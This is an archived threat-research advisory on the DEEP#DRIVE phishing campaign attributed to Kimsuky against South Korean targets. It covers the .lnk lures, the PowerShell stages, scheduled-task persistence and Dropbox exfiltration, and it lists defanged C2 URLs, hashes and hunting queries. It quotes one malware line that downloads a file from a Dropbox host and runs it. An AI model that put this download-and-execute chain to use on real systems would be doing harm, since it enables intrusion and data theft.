{ "id": "e7eaa557-fec4-4f35-942a-a5bedb9be0db", "created_at": "2026-04-06T00:17:26.593411Z", "updated_at": "2026-04-10T03:37:40.806768Z", "deleted_at": null, "sha1_hash": "d7efaadd97ce3dcbbaabda8652cd1ce4467f3b1c", "title": "Analyzing DEEP#DRIVE: North Korean Threat Actors Observed Exploiting Trusted Platforms for Targeted Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6858431, "plain_text": "Analyzing DEEP#DRIVE: North Korean Threat Actors Observed\r\nExploiting Trusted Platforms for Targeted Attacks\r\nArchived: 2026-04-05 15:44:05 UTC\r\nSecuronix Threat Research Security Advisory\r\nBy Securonix Threat Research: Den Iuzvyk, Tim Peck\r\nFeb 13, 2025\r\ntldr:\r\nThe Securonix Threat Research team has been monitoring an ongoing campaign attributed to Kimsuky targeting\r\nSouth Korean business and government sectors.\r\nThe DEEP#DRIVE attack campaign represents a sophisticated and multi-stage operation targeting South Korean\r\nbusinesses, government entities and cryptocurrency users. Leveraging tailored phishing lures written in Korean\r\nand disguised as legitimate documents, the attackers successfully infiltrated targeted environments as evidenced\r\nby information we were able to obtain on the attacker’s C2 infrastructure (see: Attacker’s Infrastructure).\r\nThe lure documents, themed as work logs, insurance documents and crypto-related files, were carefully crafted to\r\nappeal to their intended audience, increasing the likelihood of successful execution. By using trusted file formats\r\nlike .hwp, .xlsx, and .pptx, as well as widely used platforms like Dropbox for hosting malicious payloads, the\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 1 of 22\n\nattackers bypassed conventional security defenses and ensured their activity blended seamlessly into normal user\r\nbehavior.\r\nThe campaign is heavily reliant on PowerShell scripts for payload delivery, reconnaissance, and execution of next-stage malware. Key elements of the attack included the use of Dropbox to distribute payloads and exfiltrate system\r\ndata. Persistence was established via scheduled tasks, and code obfuscation was used throughout to evade\r\ndetection. \r\nWhile the attacker’s infrastructure appears to have been short-lived (evidenced by the rapid takedown of critical\r\nDropbox links) the tactics, techniques, and procedures (TTPs) align closely with Kimsuky, a North Korean\r\nAdvanced Persistent Threat (APT) group known for targeting South Korea and using similar Dropbox-based\r\nmethods in prior campaigns. (see: Victimology and attribution).\r\nKey Findings\r\nPhishing Vector: The attack chain began with a .lnk file disguised as legitimate documents, including\r\nnames such as 종신안내장V02_곽성환D.pdf.pdf.\r\nPersistence Mechanism: The .lnk file created a scheduled task named ChromeUpdateTaskMachine to\r\nensure the periodic execution of malicious scripts.\r\nReconnaissance: Scripts such as system_first.ps1 gathered detailed system information, including IP\r\naddress, OS details, antivirus products and running processes, exfiltrating this data to Dropbox.\r\nPayload execution: The temp.ps1 script downloaded, modified and decompressed a Gzip-compressed\r\n.NET assembly (system_drive.dat). The assembly was loaded directly into memory to invoke the Main\r\nmethod, executing the next-stage payload.\r\nStealth and obfuscation: The attackers attempted to obfuscate their scripts with meaningless variable\r\nnames, repeated irrelevant assignments and string concatenation to evade detection.\r\nC2 dependency: Dropbox served as the hosting platform for payloads. The removal of the associated\r\nDropbox link prevented further analysis of the Main method, suggesting the attack infrastructure was\r\ntemporary or actively monitored.\r\nAlthough we were unable to obtain the original phishing email, we were able to gather a wide range of attached or\r\ndownloaded payloads.  It is evident that phishing was the primary method of malware distribution in this\r\ncampaign as the collected samples and their filenames strongly align with common themes and wording typically\r\nused in phishing lures. \r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 2 of 22\n\nFigure 1: DEEP#DRIVE attack chain diagram\r\nThe attack relies on the user downloading a compressed (.zip) file containing a single shortcut file (.lnk). These\r\nshortcut files are crafted to resemble legitimate Microsoft Office documents, PDFs or other commonly used file\r\nformats. Since Windows hides the .lnk extension by default, threat actors exploit this behavior by appending a\r\nfalse extension, such as .xls or .pdf, before the .lnk extension. This tactic deceives users into believing the file is\r\nharmless and encourages them to double-click it, triggering the malware’s execution. \r\nStage 1: Initial PowerShell execution through .lnk files\r\nWe were able to obtain quite a few samples of recent shortcut files being used by the threat actors and they all\r\nappear to follow a common execution strategy. As seen in the figure below, the shortcut file calls the PowerShell\r\nprocess and executes a large string of code.\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 3 of 22\n\nFigure 2: Shortcut file analysis (NSTU.xls.lnk)\r\nThis PowerShell script embedded is a malicious payload designed to execute silently and relies on obfuscation,\r\nprimarily through Base64 encoding, to hide its true intent. The script begins by decoding a Base64-encoded string\r\nstored in the $ss variable which stores the next-stage PowerShell code. This decoded content is written to a\r\ntemporary file, user.ps1, in the %APPDATA% directory and executed once again using PowerShell. After\r\nexecution, the script ensures stealth by deleting the temporary file.\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 4 of 22\n\nFigure 3: Shortcut file properties\r\nThe execution of PowerShell command line code was intentionally padded with over 100 space characters. As you\r\ncan see in the figure above, this completely removed any visible code in the Target field when viewing file\r\nproperties. It’s possible that this methodology could bypass an attempt by padding the code to confuse log analysis\r\nor AV detection engines while having no bearing on the success of the code’s execution. \r\nStage 2: Decoded base64 PowerShell code\r\nThis decoded PowerShell script reveals a multi-stage attack strategy relying on file downloads, execution, and\r\npersistence mechanisms. Below is a detailed breakdown of its functionality.\r\nBelow is the decoded content of two unique samples. Overall, the code is very similar with the only change being\r\nthe lure document used and the Dropbox URL:\r\nFigure 4: Decoded PowerShell script from the .lnk file (first sample)\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 5 of 22\n\nFigure 5: Decoded PowerShell script from the .lnk file (second sample)\r\nThe script begins by setting up a temporary path using the variable $hhh to download a file named\r\n“Telegram.exe” or “종신안내장V02_곽성환D.pdf.pdf” from Dropbox. This file is stored in the system’s\r\ntemporary directory. Once downloaded, it is immediately executed using the “\u0026” operator. This executes the lure\r\ndocument to present to the user.\r\nNext, the script prepares a second PowerShell payload, referred to as chrome.ps1, and stores it in the user’s\r\n%AppData% directory. This payload is created using the $str variable and saved temporarily as temp.ps1. This\r\nfile contains instructions to download another file, “cjfansgmlans1-x.txt” or “kxsxhx-x.txt”, from Dropbox. Once\r\ndownloaded, the file is executed and its traces are removed with the Remove-Item PowerShell commandlet.\r\nTo establish persistence, the script creates a scheduled task named “ChromeUpdateTaskMachine”. The scheduled\r\ntask is configured to execute the chrome.ps1 script using PowerShell in a hidden window. The task is triggered\r\nonce, five minutes after the script runs, and repeats every 30 minutes.\r\nThe script concludes with another file download operation. It retrieves kxsxhx-f.txt from Dropbox, saves it as\r\nsystem_first.ps1 in  the local %AppData% directory, executes it, and cleans up by deleting the file.\r\nLure file analysis\r\nTaking a closer look at the first script which downloaded and attempted to execute “Telegram.exe”, we ran into\r\nsome interesting issues. First, the file is actually a .pptx file renamed with a .exe extension. Looking back at the\r\nscript, the file is downloaded and executed as-is, meaning that it is very unlikely that the file, without being\r\nrenamed to a .pptx extension, would actually execute. Renaming “Telegram.exe” to “Telegram.pptx” allows it to\r\nexecute properly and display its contents. It’s possible that this could have been a mistake from the attackers.\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 6 of 22\n\n$hhh = Join-Path ([System.IO.Path]::GetTempPath()) \"Telegram.exe\";\r\nwget -Uri \"hxxps://dl.dropboxusercontent[.]com/scl/fi/slx06ol4jmjqn16icggin/.pptx?\r\nrlkey=lky2lit5lpthkcscfnz3f91oa\u0026st=gwpkys9h\u0026dl=0\" -OutFile $hhh\r\n\u0026 $hhh;\r\nHowever, moving over to the second sample where the file  “종신안내장V02_곽성환D.pdf.pdf” is downloaded\r\nfrom Dropbox, we didn’t observe any errors in execution.\r\nBelow is a screenshot of the contents of “Telegram.exe(pptx)”.\r\nFigure 6: Phishing lure analysis (Telegram.exe)\r\nThe lure document is written in Korean and appears to cover details related to a safety work plan for forklift\r\noperations at a logistics facility, focusing on safe handling of heavy cargo and operator training and risk\r\nprevention and appears to be an official guideline document used to ensure compliance with workplace safety\r\nstandards. The attackers may be using a legitimate looking safety plan to target employees in logistics or related\r\nsectors in South Korea.\r\nStage 3 execution: chrome.ps1\r\nThe purpose of this script is simply to execute the PowerShell script found at\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/nanwt6elsuxziz05hnlt4/cjfansgmlans1-x.txt?\r\nrlkey=l6gzro1rswkqbk6tinxnkuylv\u0026st=iv78c1cg\u0026dl=0 . This file downloads and executes the final portion of the\r\nscript (temp.ps1) we’ll highlight further down.\r\nThe file is downloaded and saved to %APPDATA%\\temp.ps1 .\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 7 of 22\n\nFigure 7: contents of chrome.ps1\r\nStage 4: Persistence\r\nThe next action that the original .lnk file performs is establishing persistence on the machine. The .lnk file ensures\r\nthis by leveraging Windows scheduled tasks. The malware creates a scheduled task named\r\n“ ChromeUpdateTaskMachine “, which is configured to execute the malicious script (chrome.ps1) located in the\r\n%AppData% directory. This is achieved through the PowerShell Register-ScheduledTask cmdlet, which\r\ncombines a task action, a trigger, and specific settings. The task action specifies the execution of PowerShell.exe\r\nwith the necessary arguments to run the chrome.ps1 (temp.ps1) script. The task trigger is set to activate once, five\r\nminutes after its creation, and repeats every 30 minutes. This periodic execution guarantees that the malware runs\r\nat regular intervals, even after reboots.\r\nA few notable details related to the task: to avoid suspicion, the task is configured to run in a hidden window\r\n(using -WindowStyle Hidden) and bypasses PowerShell execution policies with the -ExecutionPolicy Bypass flag,\r\na tactic to evade restrictions that might otherwise block untrusted scripts. By using a name like\r\n“ChromeUpdateTaskMachine“, the attackers masquerade as legitimate system or browser update tasks, making the\r\nscheduled task less likely to arouse suspicion. \r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 8 of 22\n\nFigure 8: scheduled task details\r\nStage 5 execution: system_first.ps1\r\nThe final action that the original shortcut file performs is to download and execute another file from Dropbox,\r\nsystem_first.ps1.\r\nThis file is downloaded from\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/3br2y8fin0jqgrunrq3mf/cjfansgmlans1-f.txt?\r\nrlkey=rxnknu51ncb5xgnj2lyxu0xyu\u0026st=ohfmyo4p\u0026dl=0 and is stored into the script’s $aaa variable. The contents\r\nof the script are then executed using “ @ $aaa ”. This can be seen in the figures in the Stage 2: Decoded base64\r\nPowerShell code section.\r\nThe contents of the PowerShell code found in system_first.ps1 are rather interesting. Let’s dive in to discover its\r\nfunctions. In a nutshell, the script is designed to collect system information, exfiltrate it to Dropbox, and then\r\nclean up by removing the locally generated file.\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 9 of 22\n\nFigure 9: system_first.ps1 – system enumeration and connection details\r\nThe system_first.ps1 script gathers system information by querying various Windows Management\r\nInstrumentation (WMI) classes and using PowerShell commands to collect key details about the host. It retrieves\r\nthe IP address of the machine by querying Win32_NetworkAdapterConfiguration and captures the system’s last\r\nboot-up time, operating system details (version, build number, and architecture), and antivirus product names\r\nusing Win32_OperatingSystem and SecurityCenter2.AntiVirusProduct . \r\nAlso, the script determines whether the system is a laptop or desktop by checking the PCSystemType attribute in\r\nthe Win32_ComputerSystem class. It also logs the installation date of the operating system and captures all\r\ncurrently running processes on the machine. All this information is written to a uniquely named file in the\r\n%AppData% directory, formatted with the IP address, timestamp, and a specific identifier, ready for exfiltration.\r\nAll in all, it gathers comprehensive system information from the victim host, including:\r\nHost IP address\r\nSystem uptime and OS type and version details\r\nInstalled antivirus software\r\nRunning processes\r\nSystem type (desktop or laptop)\r\nFor each compromised system, a file is prepared and uploaded back to Dropbox using the following directory and\r\nnaming structure:\r\n/github/cjfansgmlans1_first/\u003cIP\u003e-\u003ctimestamp\u003e-RRR-cjfansgmlans1.txt\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 10 of 22\n\nFigure 10: system_first.ps1 – connection details and exfiltration\r\nFinal stage: Assemblies execution – temp.ps1 \r\nIf you recall the temp.ps1 script was downloaded and executed using chrome.ps1, which after execution deletes\r\nitself. It’s designed to execute obfuscated and compressed code fetched from a remote location. Given the\r\ncomplexity of the code, we’ll break it down into individual sections in an effort to understand it better. \r\nThroughout the script, the attackers used mild forms of code obfuscation in order to bypass detections. First, the\r\nattackers broke up common strings into concatenated chunks. Breaking up strings that an antivirus product might\r\nflag on is a common way to bypass detections.  Next, the attackers filled the script with junk code (the $ajaia\r\nvariable specifically) in order to either confuse analysis. It could also be an attempt to modify the file’s entropy\r\nlevel which could also assist in bypassing detections. \r\n1. Initiation and staging the execution flow\r\nThe first section of the script focuses on hiding its execution window to avoid alerting the user to its activities. It\r\nachieves this by leveraging .NET assemblies and calling the user32.dll library, a Windows API commonly used for\r\ninteracting with graphical user interfaces. \r\nThe script imports two functions, GetForegroundWindow and ShowWindow , from user32.dll. It then identifies the\r\ncurrent foreground window and applies the SW_HIDE flag, which hides the window from view. If the foreground\r\nwindow is successfully hidden, the script outputs “OK.” Otherwise, it outputs “NO.”\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 11 of 22\n\nFigure 11: temp.ps1 – execution flow\r\n2. Download and prepare the payload\r\nNext, the script downloads a file (V3.rtf) from a Dropbox URL\r\n( hxxps://dl.dropboxusercontent[.]com/scl/fi/ffrwxyw5reunc12416rmp/V3.rtf?\r\nrlkey=g4c1z24k0hjnycd1adxcdsvmq\u0026st=mmmhwelp\u0026dl=0temp.ps1 ) and saves it as “system_drive.dat” in the user’s\r\ntemporary directory. In the screenshot of the code below, we can observe the aforementioned obfuscation types\r\nbelow: string concatenation and junk code found in the $ajaia variable.\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 12 of 22\n\nFigure 12: temp.ps1 – download next-stage payload\r\n3. Modify and decompress the payload\r\nAfter downloading, the script reads the file “system_drive.dat” into a byte array. The first few bytes of the file are\r\nmodified to match the Gzip format signature ( 0x1F, 0x8B, 0x08 ). The file is then decompressed using a custom\r\nGzip decompression function ( ggggfff ).\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 13 of 22\n\nFigure 13: temp.ps1 – decompress payload\r\n4. Load and execute the payload\r\nFinally, the decompressed Gzip payload is loaded as a .NET assembly using\r\n[System.Reflection.Assembly]::Load . It then iterates through all types and methods in the assembly to find and\r\ninvoke a method named “Main”. This is where the next-stage code executes, allowing the attackers to run arbitrary\r\nlogic embedded in the payload. \r\nLastly, the script removes the system_drive.dat file from the temporary directory after processing, eliminating\r\nlocal traces of the downloaded payload.\r\nFigure 14: temp.ps1 – execute payload\r\nUnfortunately, we were unable to capture the system_drive.dat file or obtain a memory dump of the PowerShell\r\nprocess to analyze the next-stage payload. At this point it’s safe to assume that the file was most likely a backdoor\r\npayload, allowing remote access to the victim’s computer. We will provide updates as we learn more in the future.\r\nAttacker’s infrastructure and capabilities\r\nThe attacker’s infrastructure relied heavily on leveraging trusted cloud services, specifically Dropbox was used\r\nthroughout the DEEP#DRIVE campaign, to host and distribute malicious payloads. Using Dropbox URLs for\r\npayload delivery, such as V3.rtf and other files, the attackers capitalized on the platform’s reputation to evade\r\ndetection and avoid raising suspicion in monitored environments. These methods are preferred by attackers as they\r\ntypically bypass network layer defenses.\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 14 of 22\n\nThe use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of\r\nreconnaissance data, such as system information and active processes, to predetermined folders. This cloud-based\r\ninfrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing\r\ntraditional IP or domain blocklists. Additionally, the infrastructure appeared dynamic and short-lived, as evidenced\r\nby the rapid removal of key links after initial stages of the attack, a tactic that not only complicates analysis but\r\nalso suggests the attackers actively monitor their campaigns for operational security.\r\nTaking it a step further…\r\nAs our team had access to the attacker’s OAuth tokens contained in the PowerShell code, we built a script to see\r\nwhat kind of data we could pull. While limited we were able to get a small peek into the attacker’s infrastructure. \r\nThe most concerning aspect was the sheer amount of system configuration files. If you recall, each victim\r\ngenerates a unique configuration text file (Stage 5) which gets uploaded to the attacker’s Dropbox account inside a\r\n/github/ directory. While there were duplicates, we counted thousands of files, dating back to September of last\r\nyear.\r\nFigure 15: attacker’s infrastructure – victim configuration files\r\nIn addition to victim related configuration files, we were also able to see all uploaded payloads and stagers. Most\r\nof these were in Korean with a few in English. Contained were a massive grab bag of zip, pdf, xlsx and docx files.\r\nThese tend to follow typical phishing lure nomenclature and file types. \r\nThe figure below shows a portion of the directory listing from the attacker’s Dropbox repository strongly supports\r\nour hypothesis that their operations are heavily reliant on phishing campaigns targeting Korean-speaking\r\nindividuals or organizations as evidenced by the filenames\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 15 of 22\n\nFigure 16: attacker’s infrastructure – phishing lures\r\nBelow are a sample of some of the document names, their translation into English, and a description or implication\r\nof the potential phishing lure. \r\nDocument title Translation Implication\r\n메타마스크.hwp Metamask.hwp\r\nThis may reference the cryptocurrency\r\nwallet “Metamask” and could be a\r\nphishing lure targeting crypto users.\r\n24년 10 월 업무일지\r\n(최철문).xlsx\r\nOctober 2024 Work Log (Choi Chul-Moon).xlsx\r\nA work-related decoy designed to target\r\nemployees possibly impersonating a\r\nknown individual or organization.\r\n09월 매출현황(국내영\r\n업1팀-완주 디스플레\r\n이)-파주.xlsx\r\nSeptember Sales Status (Domestic\r\nSales Team 1 – Wanju Display) –\r\nPaju.xlsx\r\nThis likely targets corporate users in\r\nsales or logistics, possibly in the\r\nelectronics or manufacturing sector.\r\n여비정산서.hwp Travel Expense Report.hwp\r\nA common decoy document for\r\ntargeting employees handling expense\r\nclaims.\r\n지게차 중량물 윙바디\r\n작업계획서.pptx\r\nForklift Heavy Cargo Wing Body\r\nWork Plan.pptx\r\nUsed in this campaign. As analyzed\r\nearlier, this decoy targets logistics or\r\nindustrial operations.\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 16 of 22\n\n메타마스크 니모닉.txt Metamask Mnemonic.txt\r\nA clear phishing attempt to steal\r\ncryptocurrency wallet recovery phrases.\r\n종신안내장V02_곽성\r\n환D.pdf.pdf\r\nLifetime Insurance Guide V02_Gwak\r\nSeong-Hwan D.pdf.pdf\r\nInsurance-themed phishing, targeting\r\nindividuals in finance or policyholders.\r\n제주시정소식(2024.\r\n10. 18.).hwp\r\nJeju City Administrative News (2024.\r\n10. 18.).hwp\r\nA decoy targeting local government\r\nofficials or citizens.\r\n회사인력요구사항.pdf\r\nCompany Workforce\r\nRequirements.pdf\r\nLikely targeting HR or workforce\r\nplanning teams.\r\n(200만원 이상)수의계\r\n약 체결 제한 여부 확\r\n인서(서식).hwp\r\n(Contracts Over 2 Million KRW)\r\nRestricted Contract Execution\r\nVerification Form (Template).hwp\r\nA government or legal decoy targeting\r\nadministrative personnel handling\r\ncontracts.\r\nWrapping up…\r\nThe investigation of DEEP#DRIVE revealed an ongoing attack leveraging obfuscated PowerShell scripts and\r\nDropbox-hosted payloads to execute malicious activities. The attackers were well equipped with an already huge\r\npool of potential victims as were able to uncover.\r\nThe attack begins with a .lnk file which attempts to trick the user into executing malicious code. The code silently\r\ndownloads and executes PowerShell scripts designed to gather system information, establish persistence and\r\nretrieve additional payloads. The later stages involve downloading, decompressing, and executing a .NET\r\nassembly that contains the next phase of the attack logic. Unfortunately, the Command-and-Control (C2)\r\ninfrastructure appears to have been taken offline, preventing further analysis of the Main method within the\r\npayload.\r\nDespite the missing final stage, the analysis highlights the sophisticated techniques employed, including\r\nobfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker’s intent to evade\r\ndetection and complicate incident response.\r\nVictimology and attribution\r\nThe language used in the phishing lures strongly indicates that South Korea is the primary target of the\r\nDEEP#DRIVE campaign. Based on the content and themes of the lures, the attackers appear to focus on\r\nbusinesses, government entities and cryptocurrency sectors, leveraging tailored lure files to maximize their\r\nchances of success.\r\nHistorically, Kimsuky, a well-documented North Korean threat actor, has demonstrated a consistent focus on\r\nSouth Korea while frequently leveraging Dropbox for their operations. For instance, in March of last year, our\r\nteam identified a campaign dubbed DEEP#GOSU, during which Kimsuky was observed utilizing Dropbox links\r\nfor both payload staging and data exfiltration. Since then, similar tactics involving Dropbox have been observed in\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 17 of 22\n\nthe wild in other campaigns attributed to Kimsuky. Given these patterns, we assess with high confidence that\r\nKimsuky is the primary Advanced Persistent Threat (APT) group behind these attacks.\r\nSecuronix recommendations\r\nAs this campaign likely started using phishing emails, avoid downloading files or attachments from\r\nexternal sources, especially if the source was unsolicited where urgency is stressed. Malicious payloads\r\nfrom phishing emails can be delivered as direct attachments or links to external documents to download. \r\nCommon file types include office docs (.pptx, .docx, .xlsx), zip, rar, iso, and pdf. \r\nMaintain vigilance around the use of shortcut files (.lnk). This is a very common code execution tactic with\r\nthreat actors who rely on phishing emails to execute code.\r\nMonitor common malware staging directories, especially script-related activity in world-writable\r\ndirectories. In the case of this campaign the threat actors staged their operations out of the: C:\\Users\\\r\n\u003cusername\u003e\\appdata\\Roaming directory.\r\nWe strongly recommend deploying robust endpoint logging capabilities to aid in PowerShell detections.\r\nThis includes leveraging additional process-level logging such as Sysmon and PowerShell logging for\r\nadditional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nInitial Access T1566.001: Phishing: Spearphishing Attachment\r\nCommand and Control\r\nT1071.001: Application Layer Protocol: Web Protocols\r\nT1132: Data Encoding\r\nDefense Evasion\r\nT1027: Obfuscated Files or Information\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1036: Masquerading\r\nT1036.007: Masquerading: Double File Extension\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1620: Reflective Code Loading\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 18 of 22\n\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1204.002: User Execution: Malicious File\r\nExfiltration\r\nT1102: Web Service\r\nT1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nPersistence T1053.005: Scheduled Task/Job: Scheduled Task\r\nRelevant Securonix detections\r\nPSH-ALL-235-RU\r\nPSH-ALL-316-RU\r\nPSH-ALL-331-RU\r\nWEL-ALL-1227-RU\r\nEDR-ALL-1295-ERR\r\nRelevant hunting queries \r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND requesturl CONTAINS \"dl.dropboxusercontent[.]com\" AND (requesturl\r\nCONTAINS \"kxsxhx-f.txt\" OR requesturl CONTAINS \"kxsxhx-x.txt\" OR requesturl CONTAINS \"V02_-\r\nD.pdf.pdf\" OR requesturl CONTAINS \"241002-2024-GA-10-v2.pdf\" OR requesturl CONTAINS\r\n\"cjfansgmlans1-x.txt\" OR requesturl CONTAINS \"cjfansgmlans1-f.txt\" OR requesturl CONTAINS\r\n\"V3.rtf\")\r\nindex = activity AND rg_functionality = \"Endpoint Management Systems\"\r\nAND requesturl CONTAINS \"dl.dropboxusercontent[.]com\" AND (requesturl CONTAINS \"kxsxhx-f.txt\" OR\r\nrequesturl CONTAINS \"kxsxhx-x.txt\" OR requesturl CONTAINS \"V02_-D.pdf.pdf\" OR requesturl CONTAINS\r\n\"241002-2024-GA-10-v2.pdf\" OR requesturl CONTAINS \"cjfansgmlans1-x.txt\" OR requesturl CONTAINS\r\n\"cjfansgmlans1-f.txt\" OR requesturl CONTAINS \"V3.rtf\")\r\nindex = activity AND rg_functionality = \"Microsoft Windows Powershell\" AND scriptblocktext\r\nCONTAINS \"dl.dropboxusercontent[.]com\"\r\nC2 and infrastructure\r\nC2 Address\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/slx06ol4jmjqn16icggin/.pptx\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 19 of 22\n\nhxxps://dl.dropboxusercontent[.]com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/lc7j7be3vtd2f3hadv0bz/V02_-D.pdf.pdf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/vx23391zdxqu3qirc5z7g/241002-2024-GA-10-v2.pdf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/nanwt6elsuxziz05hnlt4/cjfansgmlans1-x.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/3br2y8fin0jqgrunrq3mf/cjfansgmlans1-f.txt\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/ffrwxyw5reunc12416rmp/V3.rtf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/4qmp7p8fkmfwfsltt6imb/0607online.pdf\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/quo63qm8d3iqlhmpyib7p/20240608.bmp\r\nhxxps://dl.dropboxusercontent[.]com/scl/fi/p8f846myv0cbs5975uszw/loader.txt\r\nAnalyzed files/hashes\r\nFile Name SHA256\r\n종신안내장v02_\r\n곽성환d.zip\r\n079907B7FEAB3673A1767DBFBC0626E656F5D3B03B6CFF471CC7CF8A1973AB34\r\n241002-2024년\r\nga영업본부 담당\r\n지점 배분(10월)\r\nv2.zip\r\n8D6DC026812420C5EF4B4FE72FB7067DA14196FEA45B6E99A594126246AC41FC\r\n거래명세서\r\n[2024.09].zip\r\n2849D92E7E188F4B76559B7018D81F6C463388A1B05B2674594F70CF4858C6B3\r\n거래명세서\r\n[2024.09].xlsx.lnk\r\nACBC775087DA23725C3D783311D5F5083C93658DE392C17994A9151447AC2B63\r\n종신안내장V02_\r\n곽성환\r\nD.pdf.pdf.lnk\r\n21CEFE1D3FE0C69C32BEBAFCA15D1AD3B17FAE37B11E6B6EFFE155327387A752\r\n241002-2024년\r\nGA영업본부 담\r\n당지점 배분(10\r\n월)v2.pdf.lnk\r\n71D56C61B765EEE74DCA65910AB9E0E2B35B21BCF6C97241CA7188A75F082F6F\r\nhttps://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/\r\nPage 20 of 22\n\n도양기업\r\n20240610 송장 갑\r\n지.bmp.lnk\r\n44FF60D352169F280801CF2075295AAB0A6151FF8F77B66D16C82776EFCE7FEA\r\n[unknown].pdf.lnk 1D5D65F2EB065BAC629C82A3399FBDC28EBE33EB288C1CD556CCA6B4E6230B52\r\nTelegram.exe / 지\r\n게차 중량물 윙바\r\n디 작업계획\r\n서.pptx\r\n074ADA5CC1947EBE5B9ACB7F2DBF0FA599B043661F4FE640D403BDCC8427AFCA\r\nuser.ps1\r\nCE04F9074A4CC8FA74FABFF5A1FE21439FD8485220321C90BB06F5DBED50170C\r\nDB3A5A3A8855A48D2AA3CA2FAEF14E35CB8F3416D10DF9C94576D9B5966DEF3D\r\nB960C9DE6714C9951EC21CA685998BA49EB29EF57868E780521B212AD6356E9C\r\n79496BAA4BF17A73006A359E146F02F7A92DD0794A07844064C7268724B98560\r\nB2B8D0AE6F521F7405305A7AFBE6D230C0DD22A18C4A852A6B69D9E54513E248\r\n6154932EF81ED274C492F55775713B25A54676E283932B9048718C1B4A837F65\r\n47DFA0061FDB021F3CEFE62AC8198733BE5ADCB756F6042CA62EFDC4F2502E97\r\nsystem_first.ps1\r\nFE84A4A119917F15418659ED30699D873B6445AA053D9303287B085E35BF1002   \r\n8E51819E39E4FC73D71B31E49B6775E47EE3B11AF1FD9EB48A1E7D49DAD62BC0\r\ntemp.ps1 DB6315274DC31BEA8F42C79EA8928A4BE2A5DD996C3E7A702F6A2BAC5C463FEE\r\nchrome.ps1\r\n8CDD557CFF23CA7DDC3CF229F3B6D755878BF7AA864DD4E9D58E590B436987E5\r\nD28E8041A0445271723842FA1D400B5B2AA93DA4DFCD68B1C763774C870DC3B1\r\n5171917E58A4E795A5E911F82560FA9B5C8F3D62EFD4054BF58A2579E78B76D7\r\n38B1CFB982C85AE89DA19BE83D502263C11DA1C1A5997E0F15DE2E5580D2161A\r\nReferences:\r\n1. Analysis of New DEEP#GOSU Attack Campaign Likely Associated with North Korean Kimsuky Targeting\r\nVictims with Stealthy 